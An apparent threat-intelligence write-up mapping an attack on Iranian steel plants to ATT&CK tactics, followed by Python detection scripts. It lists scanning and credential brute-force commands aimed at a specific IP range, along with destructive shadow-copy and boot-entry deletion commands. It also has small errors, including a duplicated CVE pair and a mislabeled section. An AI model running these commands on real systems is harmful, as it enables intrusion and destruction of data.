TTPs Reviews In Attack Against The Industry in Iran

A major cyberattack has hit the Iranian steel industry today, with hackers claiming to have taken control of systems at three state-owned companies. The incident may be the latest salvo in the escalating cyberwar between Iran and Israel.

The video contains footage which purports to show the hacking group taking control of machinery inside one of the plants.

Initial Access

Initial Access consists of techniques that use various entry vectors to gain their initial foothold within a network. Techniques used to gain a foothold include targeted spearphishing and exploiting weaknesses on public-facing web servers. Footholds gained through initial access may allow for continued access, like valid accounts and use of external remote services, or may be limited-use due to changing passwords.

Exploit Public-Facing Application

Adversaries may attempt to take advantage of a weakness in an Internet-facing computer or program using software, data, or commands in order to cause unintended or unanticipated behavior. The weakness in the system can be a bug, a glitch, or a design vulnerability. These applications are often websites, but can include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other applications with Internet accessible open sockets, such as web servers and related services. Depending on the flaw being exploited this may include Exploitation for Defense Evasion.

  • Shodan
    • vuln:cve-2021-34473 net:5.180.144.0/24
  • Nuclei
    • uncover -q 'ssl:"Uber Technologies, Inc."' | httpx -silent | nuclei -t files/ -t tokens/ -t cves/ -pbar -c 100 -o output.txt
  • Metasploit+Nmap
    • msf > db_nmap -v -sSV -p445 5.180.144.0/24

Valid Accounts

Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.

  • OWASP D4N155
  • Patator
    • ftp_login host=NET0 user=anonymous password=anonymous 0=5.180.144.0/24
    • ftp_login host=NET0 user=FILE1 1=logins.txt password=FILE2 2=rockyou.txt 0=5.180.144.0/24
  • Z668
  • Orbitaldump
    • while read hosts; do python -m orbitaldump -t 10 -u usernames.txt -p passwords.txt -h $hosts --proxies ; done < ssh.txt
  • masscan+naabu
    • masscan 5.180.144.0/24 -p22 > hosts.txt
    • naabu -iL hosts.txt -verify

Privilege Escalation

Privilege Escalation consists of techniques that adversaries use to gain higher-level permissions on a system or network. Adversaries can often enter and explore a network with unprivileged access but require elevated permissions to follow through on their objectives. Common approaches are to take advantage of system weaknesses, misconfigurations, and vulnerabilities.

Exploitation for Privilege Escalation

  • CVE-2022-26923
  • CVE-2022-26809
  • CVE-2021-34527/CVE-2021-1675
  • CVE-2021-42278/CVE-2021-42278
  • CVE-2021-40449
  • CVE-2021-34527
  • CVE-2020-0796

Valid Accounts

  • net user

Process Injection

  • OpenProcess
  • VirtualAllocEx
  • WriteProcessMemory
  • CreateRemoteThread
  • GetProcessThread
  • SetThreadContext
  • NtDuplicateToken
  • NtImpersonateThread
  • hHeapCreate
  • hHeapAlloc
  • hRtlCopyMemory
  • hCreateThread
  • SetWindowsHookExA
  • LoadLibraryA
  • RegSetValueExA
  • CreateEventA
  • SetWindowLongA
  • SendNotifyMessageA
  • VirtualProtect
  • CreateWindowExW
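The API list above only becomes meaningful for detection when the calls are seen in order from one process. The following added example (not code from the original write-up) groups a constructed API-call trace by PID and flags the classic injection chains those APIs form; the trace format, PIDs and chain names are assumptions.

```python
import re
from collections import defaultdict

# Constructed "pid api" trace lines, as a sandbox or ETW-based monitor
# might emit them. Sample data only, not from any real incident.
SAMPLE_TRACE = """\
4120 OpenProcess
4120 VirtualAllocEx
4120 WriteProcessMemory
4120 CreateRemoteThread
5532 SetWindowsHookExA
5532 LoadLibraryA
6004 OpenProcess
6004 VirtualAllocEx
7710 CreateEventA
7710 CreateWindowExW
"""

# Ordered chains built from the APIs listed on the page. Order matters;
# gaps are allowed because benign calls are interleaved in real traces.
INJECTION_CHAINS = {
    "remote-thread injection": ["OpenProcess", "VirtualAllocEx",
                                "WriteProcessMemory", "CreateRemoteThread"],
    "thread hijacking": ["OpenProcess", "WriteProcessMemory",
                         "SetThreadContext"],
    "hook injection": ["SetWindowsHookExA", "LoadLibraryA"],
}

def is_subsequence(chain, calls):
    """True if every API in chain occurs in calls in the same relative order."""
    it = iter(calls)
    return all(any(api == c for c in it) for api in chain)

def find_injection_chains(trace):
    """Return {pid: [matched chain names]} for every PID that completes a chain."""
    calls = defaultdict(list)
    for line in trace.splitlines():
        m = re.match(r"(\d+)\s+(\w+)", line)
        if m:
            calls[int(m.group(1))].append(m.group(2))
    hits = {}
    for pid, seq in calls.items():
        matched = [name for name, chain in INJECTION_CHAINS.items()
                   if is_subsequence(chain, seq)]
        if matched:
            hits[pid] = matched
    return hits

if __name__ == "__main__":
    for pid, names in find_injection_chains(SAMPLE_TRACE).items():
        print(f"pid {pid}: {', '.join(names)}")
```

PID 6004 opens and allocates but never writes or starts a thread, so it is not reported; a partial chain is worth a lower-severity alert in practice.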

Discovery

Security Software Discovery

  • netsh.exe advfirewall show allprofiles
  • tasklist.exe | findstr /i virus
  • %ProgramFiles%\Kaspersky Lab\Kaspersky Endpoint Security <version>

Network Share Discovery

  • net view

Group Policy Discovery

  • gpresult /z

Execution

Execution consists of techniques that result in adversary-controlled code running on a local or remote system. Techniques that run malicious code are often paired with techniques from all other tactics to achieve broader goals, like exploring a network or stealing data. For example, an adversary might use a remote access tool to run a PowerShell script that does Remote System Discovery.

Windows Management Instrumentation

  • powershell -Command "Get-WmiObject -class Win32_NetworkAdapter | ForEach { If ($_.NetEnabled) { $_.Disable() } }" > NUL

Command and Scripting Interpreter

  • powershell -Command \"%exclude_command% '%defender_exclusion_folder%

Group Policy Modification

  • Microsoft\Windows\Power Efficiency Diagnostics\AnalyzeAll

Schedule Task/Job

  • SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 23:55

Indicator Removal on Host

  • wevtutil

Impact

Impact consists of techniques that adversaries use to disrupt availability or compromise integrity by manipulating business and operational processes. Techniques used for impact can include destroying or tampering with data. In some cases, business processes can look fine, but may have been altered to benefit the adversaries’ goals. These techniques might be used by adversaries to follow through on their end goal or to provide cover for a confidentiality breach.

Service Stop

  • powershell -Command "Get-WmiObject -class Win32_NetworkAdapter | ForEach { If ($_.NetEnabled) { $_.Disable() } }" > NUL

Defacement

  • CreateWindowEx

Firmware Corruption

  • for /F "tokens=2" %%j in ('%comspec% /c "bcdedit -v | findstr identifier"') do bcdedit /delete %%j /f
  • C:\Windows\system32\wbem\wmic.exe shadowcopy delete
  • vssadmin.exe delete shadows /all /quiet
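The commands listed under Execution, Indicator Removal and Impact all surface in process-creation telemetry (Sysmon Event ID 1 or Security 4688). As an added example, not code from the original write-up, the script below runs a small rule set built from those commands over constructed CommandLine values; the rule names and sample records are assumptions.

```python
import re

# Constructed CommandLine values as they would appear in process-creation
# events. Sample data only; the malicious ones mirror the page's commands,
# the last two are benign look-alikes that must not fire.
SAMPLE_EVENTS = [
    "vssadmin.exe delete shadows /all /quiet",
    "wmic.exe shadowcopy delete",
    "bcdedit /delete {guid-placeholder} /f",
    "SCHTASKS /Create /SC ONCE /TN spawn /TR C:\\windows\\system32\\cmd.exe /ST 23:55",
    "wevtutil cl System",
    'powershell -Command "Get-WmiObject -class Win32_NetworkAdapter | '
    'ForEach { If ($_.NetEnabled) { $_.Disable() } }"',
    "vssadmin list shadows",
    "schtasks /query /fo LIST",
]

# (rule name, case-insensitive regex on the command line). Each rule keys on
# the destructive verb, not just the binary, so inventory commands stay quiet.
RULES = [
    ("shadow copy deletion", r"vssadmin(\.exe)?\s+delete\s+shadows"),
    ("shadow copy deletion", r"wmic(\.exe)?\s+shadowcopy\s+delete"),
    ("boot configuration deletion", r"bcdedit(\.exe)?\s+/delete\b"),
    ("scheduled task spawning cmd.exe", r"schtasks(\.exe)?\s+/create\b.*\\cmd\.exe"),
    ("event log clearing", r"wevtutil(\.exe)?\s+cl\b"),
    ("network adapter disabled via WMI", r"Win32_NetworkAdapter.*\.Disable\(\)"),
]

def scan_events(events):
    """Return [(rule name, command line)] for every event that matches a rule."""
    hits = []
    for cmdline in events:
        for name, pattern in RULES:
            if re.search(pattern, cmdline, re.IGNORECASE):
                hits.append((name, cmdline))
    return hits

if __name__ == "__main__":
    for name, cmdline in scan_events(SAMPLE_EVENTS):
        print(f"[{name}] {cmdline}")
```

Two shadow-copy deletions and a bcdedit deletion from the same host within minutes are the combination to page on; any one of them alone is rare enough on workstations to merit review.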
